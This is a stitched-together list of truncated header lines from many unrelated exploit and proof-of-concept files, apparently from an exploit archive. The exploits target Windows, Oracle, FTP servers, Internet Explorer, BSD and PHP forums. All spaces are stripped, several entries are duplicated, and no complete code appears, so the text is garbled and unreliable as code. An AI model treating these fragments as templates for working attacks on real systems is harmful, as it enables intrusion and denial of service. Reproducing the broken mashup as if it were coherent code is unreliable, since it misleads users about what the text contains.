#################################################################################Name:CodeDB(list.phplang)LocalFileInclusionVulnerability#Author:cOndemned#Greetz:ZaBeaTy,str0ke,irk4z,GregStar,doctor
=================================================MFORUM0.1aArbitraryAdd-AdminVulnerability=================================================,--^----------,--------,-----,-------^--,||||||||||`--------'|
########################################################################################################################
/******************************************************************************MicrosoftWindows.docFileMalformedPointersDoS****
<?php//////////////////////////////////////////////////////////////////////////____________////||||_______||__________||___|_|||||_//
//ejecsploit.c-localrootexploitforbsd'seject.c//harry//vulnfoundbykokanin(you31337!!!;))//thankstosacrineandalltheothernetricguys!!!yourule:)#include<stdio.h>#include<stdlib.h>
#!/usr/bin/perl##RemoteOracleKUPM$MCP.MAINexploit(10g)##Grantorrevokedbapermissiontounprivilegeduser##Testedon"OracleDatabase10gEnterpriseEditionRelease10.1.0.3.0"##REF:http://www
###ThisfileispartoftheMetasploitFrameworkandmayberedistributed#accordingtothelicensesdefinedintheAuthorsfieldbelow.Inthe#caseofanunknownormissinglicense,thisfiledefaultstothesame#licenseastheco
<HTML><!--**********************************************************************************MicrosoftInternetExplorerADODB.RecordsetDoubleFreeMemoryExploit(ms07-009).***********************************************
#!/usr/bin/python#RemoteexploitforEasyFileSharingFTPserverV2.0.Thevulnerability#wasdiscoveredbyh07andaPOCforwindowsXPSP2(polishversion)was#provided.Thisexploitwastestedonwindows2000serverSP4.Theexpl
#!/usr/bin/perl#MS07-016FTPServerResponsePoC#Usage:./ms07016ftp.pl[LISTEN_IP]##TestedAgainst:MSIE6.02900.2180(SP2)##Details:Theresponseisbrokenintobuffers,eitheratlength1024,#
#!/usr/bin/python#MSWindowsDCE-RPCsvcctlChangeServiceConfig2A()0dayMemoryCorruptionPoCExploit#BugdiscoveredbyKrystianKloskowski(h07)<h07@interia.pl>#TestedonWindows2000SP4Polish(allpatches)##Re
MS07-002EXCELMalformedPaletteRecordVulnerabilityDOSPOC######Author######LifeAsaGeekatgmail.com...andMicrosoftsaidthatvulncreditisforGregMacManusofiDefenseLabs########################Vul
<!-------------------------------------------------------------------------------------------------------------BrowseDialogClass(ccrpbds6.dll)InternetExplorerDenialofServiceauthor:shinnaimail:shinnai[at]autistici[dot]o
/*************************************************************************WFTPDserver<=3.25SITEADMNDoS****Sendingcomm
#!/usr/bin/perluseLWP::UserAgent;useGetopt::Long;if(!$ARGV[1]){print"n";print"####################VivaIslaMeVivaIslaMe#############
#include<stdio.h>#include<string.h>#include<winsock.h>#defineVULNSERVER"WAR-FTPD1.65"#defineVULNCMD"x55x53x45x52x20"#defineZERO'x00'#d
#!/usr/bin/perl#k`sOSe-7/21/2008#http://secunia.com/advisories/20172#Asploitforanancientvuln.Justbecauseineed#toimprovemyskillsonwindowsexplotation.usewarnings;usestrict;#CMD="c:window
#!/usr/bin/perluseLWP::UserAgent;useGetopt::Long;if(!$ARGV[1]){print"n";print"####################VivaIslaMeVivaIslaMe#############
#!/usr/bin/perluseLWP::UserAgent;useGetopt::Long;if(!$ARGV[1]){print"n";print"####################VivaIslaMeVivaIslaMe#############